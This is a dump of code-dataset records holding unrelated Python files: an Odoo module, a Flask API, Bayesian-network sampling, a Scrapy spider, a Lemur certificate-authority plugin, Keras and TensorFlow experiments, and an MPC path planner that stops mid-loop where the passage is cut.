utf-8 -*-\n# © 2018 - ADAX Technology\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\n\nfrom odoo import models, fields, api, exceptions\n\n\nclass uppercase_product_template(models.Model):\n _inherit = 'product.template'\n\n @api.onchange('name')\n def name_uppercase_templete(self):\n self.name = self.name.upper() if self.name else False\n\nclass uppercase_product(models.Model):\n _inherit = 'product.product'\n\n @api.onchange('name')\n def name_uppercase_product(self):\n self.name = self.name.upper() if self.name else False","sub_path":"modulos/inventario/uppercase_product/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264589670","text":"from flask import Flask, request, jsonify, abort\nfrom pymongo import MongoClient\nfrom trlight import init_state, get_response, clear_sequences\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\ndef get_collection():\n return MongoClient(\"mongodb://db:27017\").trl.seq\n\n@app.route(\"/sequence/create\", methods=['POST'])\ndef create_sequence():\n response = {\"status\": \"ok\", \"response\": {\"sequence\": init_state(get_collection())}}\n return jsonify(**response)\n\n@app.route(\"/observation/add\", methods=['POST'])\ndef observation_add():\n json = request.get_json()\n if not json:\n return abort(400)\n response = get_response(json, get_collection())\n return jsonify(**response)\n\n@app.route(\"/clear\", methods=[\"POST\"])\ndef clear():\n clear_sequences(get_collection())\n response = {\"status\": \"ok\", \"response\": \"ok\"}\n return jsonify(**response)\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"606053937","text":"from functools import reduce\n\nfrom nodes import Bernoulli\nfrom gibbs import sample\n\nBurglary = Bernoulli(name='Burglary', ps=.001)\nEarthquake = Bernoulli(name='Earthquake', ps=.002)\nAlarm = Bernoulli(name='Alarm', ps=[ .001, .29, .94, .95 ])\nJohnCalls = Bernoulli(name='JohnCalls', ps=[ .05, .90 ], val=0, observed=True)\nMaryCalls = Bernoulli(name='MaryCalls', ps=[ .01, .70 ], val=0, observed=True)\n\nBurglary.add_child(Alarm)\nAlarm.add_parent(Burglary)\nEarthquake.add_child(Alarm)\nAlarm.add_parent(Earthquake)\n\nAlarm.add_child(JohnCalls)\nJohnCalls.add_parent(Alarm)\nAlarm.add_child(MaryCalls)\nMaryCalls.add_parent(Alarm)\n\nnodes = [ Burglary, Earthquake, Alarm, JohnCalls, MaryCalls ]\n\nsamples = sample(nodes)\n\n# Check the Burglary count\ncount = reduce(lambda count, s: count + s[0], samples, 0)\n\nprint(count)\n\n#P(Burglary=true) = 0.001\n#P(Eathquake=true) = 0.002\n#P(Alarm=true | Burglary=true, Earthquake=true) = 0.95\n#P(Alarm=true | Burglary=true, Earthquake=false) = 0.94\n#P(Alarm=true | Burglary=false, Earthquake=true) = 0.29\n#P(Alarm=true | Burglary=false, Earthquake=false) = 0.001\n#P(JohnCalls=true | Alarm=true) = 0.90\n#P(JohnCalls=true | Alarm=false) = 0.05\n#P(MaryCalls=true | Alarm=true) = 0.70\n#P(MaryCalls=true | Alarm=false) = 
0.01\n\n","sub_path":"mcmc1-gibbs-sampling/experiments/p-burglary-given-john-does-not-call-and-mary-does-not-call.py","file_name":"p-burglary-given-john-does-not-call-and-mary-does-not-call.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"305177379","text":"# -*- coding: utf-8 -*-\nimport json\nimport re\n\nimport scrapy\n\nfrom locations.items import GeojsonPointItem\nfrom locations.hours import OpeningHours\n\n\nclass ErnstYoungSpider(scrapy.Spider):\n name = \"ernst_young\"\n item_attributes = { 'brand': \"Ernst & Young\" }\n allowed_domains = []\n start_urls = [\n 'https://www.ey.com/eydff/services/officeLocations.json',\n ]\n\n def parse_office(self, office):\n properties = {\n 'name': office[\"name\"],\n 'ref': office[\"href\"].replace('/locations/', ''),\n 'addr_full': office[\"officeAddress\"].strip().replace('\\r\\n', ' '),\n 'city': office[\"officeCity\"],\n 'postcode': office[\"officePostalCode\"],\n 'country': office[\"officeCountry\"],\n 'phone': office[\"officePhoneNumber\"],\n 'lat': float(office[\"officeLatitude\"]),\n 'lon': float(office[\"officeLongitude\"]),\n }\n return properties\n\n def parse(self, response):\n data = json.loads(response.body_as_unicode())\n\n for country in data[\"countries\"]:\n\n for state in country[\"states\"]:\n state_abbr = state[\"stateAbbreviation\"]\n for city in state[\"cities\"]:\n for office in city[\"offices\"]:\n properties = self.parse_office(office)\n properties[\"state\"] = state_abbr\n properties[\"website\"] = response.urljoin(office[\"href\"])\n yield GeojsonPointItem(**properties)\n\n for city in country[\"cities\"]:\n\n for office in city[\"offices\"]:\n properties = self.parse_office(office)\n properties[\"website\"] = response.urljoin(office[\"href\"])\n yield GeojsonPointItem(**properties)\n","sub_path":"locations/spiders/ernst_young.py","file_name":"ernst_young.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"128575865","text":"\"\"\"\n.. module: lemur.plugins.lemur_mscertsrv.plugin\n :platform: Unix\n :synopsis: This module is responsible for communicating with the Microsoft Certificate Services CA.\n :copyright: (c) 2016 by Thomson Reuters\n :license: Apache, see LICENSE for more details.\n\n.. 
moduleauthor:: Bugga Luggs \n\"\"\"\n\nimport json\nimport requests\nimport re\nimport io\nimport pem\nfrom bs4 import BeautifulSoup\nfrom requests_ntlm import HttpNtlmAuth\nfrom cryptography import x509\n\nfrom flask import current_app\n\nfrom lemur.common.utils import validate_conf\nfrom lemur.plugins.bases import IssuerPlugin\nfrom lemur.plugins import lemur_mscertsrv as mscertsrv\n\n\n\nclass MSCertSrvIssuerPlugin(IssuerPlugin):\n title = 'MSCERTSRV'\n slug = 'mscertsrv-issuer'\n description = 'Enables the creation of certificates by Microsoft Certificate Services CA'\n version = mscertsrv.VERSION\n\n author = 'Bugga Luggs'\n author_url = 'https://github.com/pr8kerl/lemur-mscertsrv.git'\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the issuer with the appropriate details.\"\"\"\n\n required_vars = [\n 'MSCERTSRV_URL',\n 'MSCERTSRV_DOMAIN',\n 'MSCERTSRV_USERNAME',\n 'MSCERTSRV_PSW',\n 'MSCERTSRV_INTERMEDIATE',\n 'MSCERTSRV_ROOT',\n 'MSCERTSRV_CERTIFICATE_TEMPLATE',\n ]\n validate_conf(current_app, required_vars)\n\n self.session = requests.Session()\n current_app.logger.info(\"MSCERTSRV: init\")\n super(MSCertSrvIssuerPlugin, self).__init__(*args, **kwargs)\n\n def create_certificate(self, csr, issuer_options):\n \"\"\"\n Creates a MSCERTSRV certificate.\n\n :param csr:\n :param issuer_options:\n :return:\n \"\"\"\n # ping the server to setup the auth and ensure we are valid\n auth_response = self.ntlm_authenticate()\n current_app.logger.info(auth_response)\n current_app.logger.info(auth_response.headers)\n\n url = \"{0}{1}\".format(current_app.config.get('MSCERTSRV_URL'), '/certsrv/certfnsh.asp')\n\n data = self.get_post_data(csr, issuer_options)\n current_app.logger.info(data)\n\n # request certificate from MS CA\n response = self.session.post(url, data=data)\n current_app.logger.info(response)\n current_app.logger.info(response.request.headers)\n response.raise_for_status()\n\n durl = self.parse_download_url(response.content)\n if not durl:\n raise ValueError('no download url returned - pls investigate logs')\n\n # download cert in pem format\n response = self.session.get(durl)\n response.raise_for_status()\n current_app.logger.info(response.headers)\n certs = pem.parse(response.content)\n cert = \"\\n\".join(str(certs[0]).splitlines())\n current_app.logger.info(\"MSCERTSRV: cert: {0}\".format(cert))\n\n return cert, current_app.config.get('MSCERTSRV_INTERMEDIATE')\n\n def parse_download_url(self, body):\n \"\"\"pull out the relative url to download the single certificate in PEM format.\"\"\"\n soup = BeautifulSoup(body, 'html.parser')\n\n download_url = None\n # certnew.cer?ReqID=127&Enc=b64\n for elem in soup.find_all('a', href=re.compile('certnew\\.cer\\?ReqID=\\d+&Enc=b64')):\n href = elem['href']\n current_app.logger.info(\"MSCERTSRV: matched href: {0}\".format(href))\n relative_download_url = '/certsrv/' + href\n download_url = \"{0}{1}\".format(current_app.config.get('MSCERTSRV_URL'), relative_download_url)\n current_app.logger.info(\"MSCERTSRV: download url: {0}\".format(download_url))\n\n if not download_url:\n current_app.logger.info(\"MSCERTSRV: download url not found: {0}\".format(soup))\n\n return download_url\n\n\n def get_post_data(self, csr, issuer_options):\n current_app.logger.info(\"MSCERTSRV: requesting a new mscertsrv certificate with csr: {0}\".format(csr))\n current_app.logger.info(\"MSCERTSRV: issuer options: {0}\".format(issuer_options))\n template = 'CertificateTemplate:' + current_app.config.get('MSCERTSRV_CERTIFICATE_TEMPLATE')\n data = {\n 
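# descriptive comment (added): form fields submitted to certfnsh.asp; names mirror the certsrv web-enrollment form\n            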
'Mode': 'newreq',\n 'CertRequest': csr,\n 'CertAttrib': template,\n 'UserAgent': 'Lemur MSCERTSRV Plugin',\n 'SaveCert': 'yes',\n 'TargetStoreFlags': 0,\n 'ThumbPrint': '',\n 'FriendlyType': 'Saved-Request Certificate (2017-5-11 22:32:31)'\n }\n return data\n\n def ntlm_authenticate(self):\n \"\"\"\n Accesses the MSCCERTSRV csr request page to setup the NTLM session.\n\n :return:\n \"\"\"\n session_username = current_app.config.get('MSCERTSRV_DOMAIN') + '\\\\' + current_app.config.get('MSCERTSRV_USERNAME')\n # session_username = current_app.config.get('MSCERTSRV_USERNAME')\n session_pwd = current_app.config.get('MSCERTSRV_PSW')\n url = \"{0}{1}\".format(current_app.config.get('MSCERTSRV_URL'), '/certsrv/certrqxt.asp')\n\n self.session.auth = HttpNtlmAuth(session_username, session_pwd, self.session)\n auth_response = self.session.get(url, verify=False)\n auth_response.raise_for_status()\n return auth_response\n\n @staticmethod\n def create_authority(options):\n \"\"\"\n Creates an authority, this authority is then used by Lemur to allow a user\n to specify which Certificate Authority they want to sign their certificate.\n\n :param options:\n :return:\n \"\"\"\n role = {'username': '', 'password': '', 'name': 'mscertsrv'}\n current_app.logger.info(\"MSCERTSRV: creating a new authority\")\n return current_app.config.get('MSCERTSRV_ROOT'), \"\", [role]\n","sub_path":"lemur_mscertsrv/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"428939795","text":"import keras\nfrom keras import models, Model\nfrom matplotlib import pyplot\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import Model\nfrom matplotlib import pyplot as plt\nfrom numpy import expand_dims\nimport sys\n\n\n\n\nmodel = keras.models.load_model('aid/final_model_2.h5')\nmodel.summary()\n\nfor layer in model.layers:\n\t# check for convolutional layer\n\tif 'conv' not in layer.name:\n\t\tcontinue\n\t# get filter weights\n\tfilters, biases = layer.get_weights()\n\tprint(layer.name, filters.shape)\n\n\nfilters, biases = model.layers[0].get_weights()\n# normalize filter values to 0-1 so we can visualize them\nf_min, f_max = filters.min(), filters.max()\nfilters = (filters - f_min) / (f_max - f_min)\n# plot first few filters\nn_filters, ix = 6, 1\nfor i in range(n_filters):\n # get the filter\n f = filters[:, :, :, i]\n # plot each channel separately\n for j in range(3):\n # specify subplot and turn of axis\n ax = pyplot.subplot(n_filters, 3, ix)\n ax.set_xticks([])\n ax.set_yticks([])\n # plot filter channel in grayscale\n pyplot.imshow(f[:, :, j], cmap='brg')\n ix += 1\n\t# show the figure\nfilename = sys.argv[0].split('/')[-1]\nplt.savefig(filename + 'filter_plt_brg.png')\nplt.close()\npyplot.show()\n\nfor i in range(len(model.layers)):\n\tlayer = model.layers[i]\n\t# check for convolutional layer\n\tif 'conv' not in layer.name:\n\t\tcontinue\n\t# summarize output shape\n\tprint(i, layer.name, layer.output.shape)\n\n\nmodel.summary()\nmodel = Model(inputs=model.inputs, outputs=model.layers[0].output)\n\nimg = load_img('train/dog/dog.1.jpg', target_size=(200, 200))\n# convert the image to an array\nimg = img_to_array(img)\n# expand dimensions so that it represents a single 'sample'\nimg = expand_dims(img, axis=0)\n# prepare the image (e.g. 
scale pixel values for the vgg)\n# get feature map for first hidden layer\nfeaturemaps = model.predict(img)\n# plot all 64 maps in an 8x8 squares\n\nsquare = 4\nix = 1\n\nfor _ in range(square):\n for _ in range(square):\n # specify subplot and turn of axis\n ax = plt.subplot(square, square, ix)\n ax.set_xticks([])\n ax.set_yticks([])\n # plot filter channel in grayscale\n plt.imshow(featuremaps[0, :, :, ix-1], cmap='brg')\n ix += 1\n\t# show the figure\nfilename = sys.argv[0].split('/')[-1]\nplt.savefig(filename + 'map_plt_brg.png')\nplt.close()\nplt.show()\n\n\n\n","sub_path":"filtersvis.py","file_name":"filtersvis.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"465222437","text":"import tensorflow as tf\nfrom flows import NormalRW, DFlow, NVPFlow, LogNormal, GVAR, phase,Normal, floatX, MVNormal, MVNormalRW, Linear, LinearChol\nfrom flows.models import VARmodel\nimport flows\n\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.contrib.distributions import WishartCholesky\nimport math\nfrom tqdm import tqdm\nimport pickle as pkl\n\nnp.random.seed(1234)\ntf.set_random_seed(1234)\n\nccodes = ['AUS', 'FRA', 'GBR']\ndatas = ['../../CDATA/{}.csv'.format(x) for x in ccodes]\n\ndatas = [pd.read_csv(x, index_col='VARIABLE').iloc[:,:-1] for x in datas]\n\nmean_std = 0.\nfor data in datas:\n std = np.std(data.values[:,1:] - data.values[:,:-1], axis=1)\n mean_std = std + mean_std\nmean_std /= len(datas)\nmean_std = np.concatenate([mean_std]*2, axis=0)\nprint('Mean std: {}'.format(mean_std))\n\nmax_year = 0\nfor i, data in enumerate(datas):\n data = data.astype(floatX)\n data.columns = data.columns.astype('float32')\n \n new_data = np.concatenate([data.values.T[1:], data.values.T[:-1]], axis=1)\n new_data_columns = data.columns[1:]\n new_data = pd.DataFrame(new_data.T/mean_std[:,np.newaxis], columns=new_data_columns)\n data = new_data\n datas[i] = data\n max_year = max(max(data.columns), max_year)\n\nVAR_DIM = 4\n\nYEARS = [x for x in data.columns if x > 2000]\n\ncountry_data = {c:d for c,d in zip(ccodes, datas)}\n\n\n#BUILDING the model\n\ncurrent_year = tf.placeholder(tf.float32, shape=(), name='current_year')\ntf.summary.scalar('current_year', current_year)\n\ndef create_variation():\n with tf.variable_scope('variation_rate', dtype=floatX):\n variation_prior = tf.distributions.Exponential(rate=4.5)\n dim_ = (VAR_DIM*2+1)*VAR_DIM\n variation_mu = tf.get_variable('mu', shape=[dim_], initializer=tf.constant_initializer(math.log(0.3)))\n variation_presigma = tf.get_variable('presigma', shape=[dim_], initializer=tf.constant_initializer(-3.))\n variation_d = LogNormal(dim=dim_, mu=variation_mu, sigma=tf.exp(variation_presigma))\n \n variation = variation_d.sample()\n\n pp = tf.cast(tf.reduce_sum(variation_prior.log_prob(tf.cast(variation, tf.float32))), floatX)\n ld = variation_d.logdens(variation)\n tf.add_to_collection('logdensities', ld)\n tf.add_to_collection('priors', pp)\n\n tf.summary.histogram('variation', variation)\n tf.summary.scalar('mean_variation', tf.reduce_mean(variation))\n return variation\n\nglobal_inf = DFlow([NVPFlow(dim=(VAR_DIM*2+1)*VAR_DIM, name='flow_{}'.format(i)) for i in range(6)], init_sigma=0.01)\nglobal_prior = Normal(None, sigma=5.).logdens(global_inf.output)\ntf.add_to_collection('priors', global_prior)\ntf.add_to_collection('logdensities', global_inf.logdens[0])\n\n\nmodels = []\nindiv_logdens = []\nindiv_priors = []\nindivs = {}\n\nwith 
tf.variable_scope(tf.get_variable_scope(), dtype=floatX, reuse=tf.AUTO_REUSE):\n for country, data in country_data.items():\n with tf.variable_scope(country):\n variation = create_variation()\n individ_variation_prior = Normal((VAR_DIM*2+1)*VAR_DIM, sigma=variation, mu=global_inf.output[0])\n\n aux = tf.concat([global_inf.output, variation[tf.newaxis]], axis=-1)\n individ_variation = DFlow([NVPFlow((VAR_DIM*2+1)*VAR_DIM, \n name='nvp_{}'.format(i), \n aux_vars=aux) for i in range(6)], init_sigma=0.01)\n\n ind = individ_variation.output[0] + global_inf.output[0]\n indivs[country] = ind\n\n indiv_logdens.append(individ_variation.logdens)\n indiv_priors.append(individ_variation_prior.logdens(ind))\n\n model = VARmodel(data, name='{}_model'.format(country), var_dim=VAR_DIM, mu=ind[tf.newaxis], current_year=current_year)\n models.append(model)\n\ngraph = tf.get_default_graph()\n\nprior = tf.reduce_sum([model.priors for model in models])+ tf.reduce_sum(indiv_priors) + tf.reduce_sum(graph.get_collection('priors'))\n\nlogdensity = tf.reduce_sum([model.logdensities for model in models])+ tf.reduce_sum(indiv_logdens) + tf.reduce_sum(graph.get_collection('logdensities'))\n\nkl = logdensity - prior\nkl /= 36*200*4\n\n\nkls = tf.summary.scalar('KLd', kl)\nsummary = tf.summary.merge_all()\n\n\nmain_op = tf.train.AdamOptimizer(0.0001).minimize(kl)\n\nsess = tf.InteractiveSession()\ninit = tf.global_variables_initializer()\n\ninit.run()\n\nwriter = tf.summary.FileWriter('/tmp/tfdbg/gpu0')\n\ndef validate_year(year):\n cdic = {model.name:model for model in models}\n preds = {model.name:[] for model in models}\n preds_t = {model.name: model.preds for model in models}\n\n for step in range(1500):\n preds_i = sess.run(preds_t, {current_year:year})\n for k in preds.keys():\n preds[k].append(preds_i[k][cdic[k].years > year])\n \n mean_pred = {k:np.mean(v, axis=0) for k,v in preds.items()}\n for c, pred in mean_pred.items():\n pred_years = [x for x in YEARS if x > year]\n pred = pd.DataFrame(pred.T, columns=pred_years)\n mean_pred[c] = pred\n\n for model in models:\n try:\n a = model.data_raw.loc[:,year].values[:VAR_DIM]\n except KeyError:\n a = np.zeros(VAR_DIM, dtype=floatX)*np.nan\n mean_pred[model.name]['CYEAR={}'.format(year)] = a\n return mean_pred\n\nsaver = tf.train.Saver()\n\noptions = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\nrun_metadata = tf.RunMetadata()\n\nfd = {current_year:YEARS[0]}\nsess.run(main_op, fd, options=options, run_metadata=run_metadata)\n\nfrom tensorflow.python.client import timeline\n# Create the Timeline object, and write it to a json file\nfetched_timeline = timeline.Timeline(run_metadata.step_stats)\nchrome_trace = fetched_timeline.generate_chrome_trace_format()\nwith open('timeline_01.json', 'w') as f:\n f.write(chrome_trace)\n","sub_path":"experiments/gpu_test/VAR-hierarchical_shrinkage.py","file_name":"VAR-hierarchical_shrinkage.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"286279688","text":"\"\"\"Tournament play experiment.\"\"\"\nfrom __future__ import absolute_import\nimport netbuilder\nimport gp\nimport pickle\n# Use cuda\nCUDA = True\n\nif __name__=='__main__':\n # setup a tournament!\n nb_evolution_steps = 20\n tournament = \\\n gp.TournamentOptimizer(\n population_sz=50,\n init_fn=netbuilder.randomize_network,\n mutate_fn=netbuilder.mutate_net,\n nb_workers=5,\n use_cuda=True)\n\n for i in range(nb_evolution_steps):\n print('\\nEvolution 
step:{}'.format(i))\n print('================')\n tournament.step()\n # keep track of the experiment results & corresponding architectures\n name = \"tourney_{}\".format(i)\n pickle.dump(tournament.stats, open(name + '.stats','wb'))\n pickle.dump(tournament.history, open(name +'.pop','wb'))\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"348963732","text":"def f_cpn(k):\r\n\treturn lambda n: (k*n*(n-1))/2 + 1\r\n\r\ns_cpn = lambda i: \"cpn(\"+str(i)+\")\"\r\n\r\ndef cpn_freqs(gons,bound):\r\n\tfreq = {}\r\n\tfor i in range(3,gons+1):\r\n\t\tp = p_frequency(f_cpn(i),bound)\r\n\t\tprint(\"============\")\r\n\t\tprint(\"cpn(\"+str(i)+\"): \"+str(p))\r\n\t\tprint(\"============\")\r\n\t\tfreq[\"cpn(\"+str(i)+\")\"] = p\r\n\treturn freq\r\n\r\ndef resolve_cpn(freqs):\r\n\tfor i in range(3,len(freqs)+3):\r\n\t\tprint(i,\":\",freqs[s_cpn(i)])\r\n","sub_path":"prime-patterns/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"260848291","text":"#!/usr/bin/env python3\n\nimport sys, os\nimport _pickle as cPickle\n\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom get_data import get_data\nfrom get_model import get_model\n\ndef main():\n if len(sys.argv) < 3:\n raise Exception('missing training data or model name')\n\n events_json_path = sys.argv[1]\n model_name = sys.argv[2]\n\n data = get_data(events_json_path)\n\n train_documents = data['train']['documents']\n train_labels = data['train']['labels']\n\n test_documents = data['test']['documents']\n test_labels = data['test']['labels']\n\n vectorizer = CountVectorizer(\n analyzer = 'word',\n tokenizer = None,\n preprocessor = None,\n stop_words = None,\n max_features = 5000\n )\n\n\n train_data_features = (\n vectorizer.fit_transform(train_documents).toarray()\n )\n\n model = get_model(train_data_features, train_labels, model_name)\n\n test_data_features = vectorizer.transform(test_documents).toarray()\n print(\"Score: \", model.score(test_data_features, test_labels))\n save_model(model, model_name, vectorizer)\n\ndef save_model(model, model_name, vectorizer):\n pathname = os.path.dirname(sys.argv[0])\n fullpath = os.path.abspath(pathname)\n with open(fullpath + '/models/' + model_name + '.pkl', 'wb') as fid:\n cPickle.dump(model, fid)\n with open(\n fullpath + '/models/' + model_name + '_vectorizer.pkl', 'wb'\n ) as fid:\n cPickle.dump(vectorizer, fid)\n\nif __name__ == '__main__':\n main()\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"335613262","text":"# This code takes the square root of the number inputed\n\n# imports module\nfrom sys import argv\n# says that argv should expect the run of the program and a user input in the terminal\nscript, arg = argv\n\n# makes variable \"n\" to the user input\nn = int(arg)\n\nfor i in range( 1, n ):\n \n # if the floor of the user input divided by \"i\" is the same as the user input AND if the mod of the user input is 0, print the floor of the user input divided by the \"i\"\n if n//i == i and n%i == 0:\n print(n//i)\n \n # exit(0) will be a good exit\n exit(0)\n 
\nprint(False)","sub_path":"webDev/ex37.py","file_name":"ex37.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"438052359","text":"# -*- coding:utf-8 -*-\nimport requests\nimport json\nclass RunMain(): # 封装 get/post 方法\n def send_post(self,url,data,headers):\n result = requests.post(url = url,data = data,headers= headers).json()\n res = json.dumps(result, ensure_ascii=False, sort_keys=True, indent=2)\n return res\n def send_get(self,url,data,headers):\n result = requests.get(url = url,data = data,headers = headers).json()\n res = json.dumps(result,ensure_ascii=False,sort_keys=True,indent=2)\n return res\n def run_main(self,method,url=None,data=None,headers = None):\n result = None\n if method == 'get':\n result = self.send_get(url,data,headers)\n elif method == 'post':\n result = self.send_post(url,data,headers)\n return result\nif __name__ == '__main__':\n url = 'http://127.0.0.1:8888/login'\n data1 = {'name':'xiaoming','pwd':'111'}\n data2 = 'name=xiaoming&pwd=11'\n result1 = RunMain().run_main('post',url,data1)\n result2 = RunMain().run_main('get',url,data2)\n print(result1)\n print(result2)","sub_path":"common/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"52005703","text":"r\"\"\"\nTests for the :mod:`scglue.metrics` module\n\"\"\"\n\n# pylint: disable=redefined-outer-name, wildcard-import, unused-wildcard-import\n\n\nimport numpy as np\nimport pytest\n\nimport scglue.metrics\n\nfrom .fixtures import *\n\n\ndef test_mean_average_precision(rna_pp):\n mean_average_precision = scglue.metrics.mean_average_precision(\n rna_pp.obsm[\"X_pca\"],\n rna_pp.obs[\"ct\"].to_numpy().ravel()\n )\n assert 0 <= mean_average_precision <= 1\n\n\ndef test_seurat_alignment_score(atac_pp):\n seurat_alignment_score = scglue.metrics.seurat_alignment_score(\n atac_pp.obsm[\"X_lsi\"],\n atac_pp.obs[\"ct\"].to_numpy().ravel()\n )\n assert 0 <= seurat_alignment_score <= 1\n\n\ndef test_foscttm(rna_pp, atac_pp):\n foscttm_x, foscttm_y = scglue.metrics.foscttm(\n rna_pp.obsm[\"X_pca\"], rna_pp.obsm[\"X_pca\"]\n )\n assert np.all(foscttm_x == 0)\n assert np.all(foscttm_y == 0)\n foscttm_x, foscttm_y = scglue.metrics.foscttm(\n rna_pp.obsm[\"X_pca\"][:20], atac_pp.obsm[\"X_lsi\"][:20]\n )\n assert 0 < foscttm_x.mean() <= 1\n assert 0 < foscttm_y.mean() <= 1\n\n with pytest.raises(ValueError):\n foscttm_x, foscttm_y = scglue.metrics.foscttm(\n rna_pp.obsm[\"X_pca\"], atac_pp.obsm[\"X_lsi\"]\n )\n","sub_path":"tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460769582","text":"import numpy as np\nfrom scipy import spatial\nimport matplotlib.pyplot as plt\nimport math \nfrom numpy import cos, sin, pi\nimport numpy as np\nfrom numpy import pi, cos, sin\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nfrom pylab import *\nfrom casadi import Function, linspace, vertcat, horzcat, DM, interpolant, sum1, MX, hcat, sumsqr\nfrom rockit import *\nfrom rockit import Ocp , FreeTime, MultipleShooting\nfrom MPC_Bubble_tunnel_generation_v2 import generate_bubbles_mpc_v2, plotting, get_bubbles_mpc_loop, generate_bubbles_mpc_v3\nfrom MPC_Grid_generation import create_obstacles_mpc, create_global_path_mpc\nfrom Bubble_tunnel_generation_v2 import 
create_tunnel, plotting_v2\n\n\ndef is_inside_ellipse( x, y, xp, yp, a, b): \n \n is_inside = 0\n\n ellipse = (x-xp)**2/a**2 + (y-yp)**2/b**2\n \n if (ellipse < 1): \n is_inside = 1\n \n return is_inside\n \ndef find_path(global_path_x, global_path_y, xp , yp , radiusx ,radiusy, N):\n \n index = 0\n for i in range(0, len(global_path_x)):\n e = (global_path_x[i]-xp)**2/radiusx**2 + (global_path_y[i]-yp)**2/radiusy**2\n if e > 1:\n break\n else:\n index = i\n #----------- N points of path\n Bspline_obj, u = interpolate.splprep([global_path_x[0:index],global_path_y[0:index]], u = None, s = 0)\n u = np.linspace(0,1,N)\n global_path = interpolate.splev(u, Bspline_obj)\n global_path_x_new = np.array(global_path[0])\n global_path_y_new = np.array(global_path[1])\n \n return global_path_x_new, global_path_y_new\n\n \n \n\n\nobstacles_option = 1\npath_option = 1\n\n\nglobal_end_goal_x = 9 #position of initial and end point\nglobal_end_goal_y = 9\ninitial_pos_x = 0\ninitial_pos_y = 0\nxlim_min = -2 #xlim and ylim of plotsR\nxlim_max = 12\nylim_min = -2\nylim_max = 12\n\n\nwhile initial_pos_x < 8 or initial_pos_y < 8 :\n \n \n obs_horizon = 30\n path_horizon = 2 # less than 3 causes problems (jumps overs the original path)\n \n N = 5\n \n \n occupied_positions_x , occupied_positions_y = create_obstacles_mpc(obstacles_option,initial_pos_x,initial_pos_y,obs_horizon)\n \n global_path_x, global_path_y, Bspline_obj = create_global_path_mpc(path_option,initial_pos_x,initial_pos_y,path_horizon, N)\n \n initial_pos_x = global_path_x[10]\n initial_pos_y = global_path_y[10]\n \n npoints = 500 #numbr of points of every circle\n ts = np.linspace(0, 2*np.pi, npoints) #for creating circles points\n \n \n if (occupied_positions_x.size != 0): #if there are obstacles\n \n acceptable_radius = 1\n \n occ = np.array([occupied_positions_x,occupied_positions_y]).T\n tree = spatial.KDTree(occ)\n \n point = np.array([global_path_x[0],global_path_y[0]]) #point on the path\n \n \n #--------------- for choosing the bubble radius ----------------------------------------------\n \n\n idxs = tree.query(point, 2)\n nearest_index = idxs[1][1]\n nearest_point = occ[nearest_index]\n radius = np.sqrt(np.sum(np.square(point - nearest_point))) \n\n \n \n if abs(nearest_point[0] - point[0]) < 0.2:\n long_axis_y = False\n \n elif abs(nearest_point[1] - point[1]) < 0.2:\n long_axis_y = True \n else:\n long_axis_y = True\n \n # print(long_axis_y)\n \n #----------------- shifting midpoint \n \n shifted_radius = radius\n shifted_point = point\n \n # new_radius = []\n # new_radius.append(radius)\n \n # if (radius < acceptable_radius):\n \n # deltax = 0.2*(point[0] - nearest_point [0])\n # deltay = 0.2*(point[1] - nearest_point [1])\n # new_point = point\n \n # for ss in range(0,5):\n \n # new_rad = 0\n \n # new_point = np.array( [new_point[0] + deltax , new_point[1] + deltay ])\n \n # idxs2 = tree.query(new_point, 2)\n # nearest_index2 = idxs2[1][1]\n # nearest_point2 = occ[nearest_index2]\n \n # new_rad = np.sqrt(np.sum(np.square(new_point - nearest_point2))) \n \n # if new_rad >= new_radius[-1]:\n # new_radius.append(new_rad)\n # shifted_radius = new_radius[-1]\n # shifted_point = new_point\n # nearest_point = nearest_point2\n # if shifted_radius > acceptable_radius:\n # break\n \n \n #----------------- Ellipse second radius -----------------------------------------\n\n shifted_radius = 0.9*shifted_radius\n radius1 = shifted_radius\n radius2 = shifted_radius\n rad = shifted_radius\n point = shifted_point\n \n \n while True:\n \n rad = rad + 
